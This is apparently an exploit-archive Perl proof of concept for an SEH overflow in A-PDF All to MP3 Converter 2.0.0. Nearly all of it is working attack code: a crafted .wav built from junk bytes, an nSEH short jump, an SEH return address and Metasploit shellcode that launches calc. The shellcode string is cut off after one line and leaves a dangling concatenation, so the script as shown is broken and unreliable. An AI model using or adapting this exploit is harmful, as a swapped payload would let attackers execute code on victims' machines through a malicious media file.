# Exploit Title: A-PDF All to MP3 Converter v.2.0.0 SEH overflow
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: <= 2.0.0
# Tested on: Win XP SP2 English
# Date: 29/01/2011
# Author: m0nna
#Email: malware.monna@gmail.com
# triggering details:Open the app, drag the crafted .wav file, calc pops out
# Credits to : h1ch4m (for the stack based overflow exploit)
my $file = "exploit_seh.wav";
my $junk ="\x41" x 4132 ;
my $nseh = "\xeb\x06\x90\x90";
my $seh = pack("V", 0x005d6a91);
# windows/exec - 343 bytes
# http://www.metasploit.com
# Encoder: PexAlphaNum
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
open OUTPUT, ">", "$file";
print OUTPUT $junk.$nseh.$seh.$shellcode;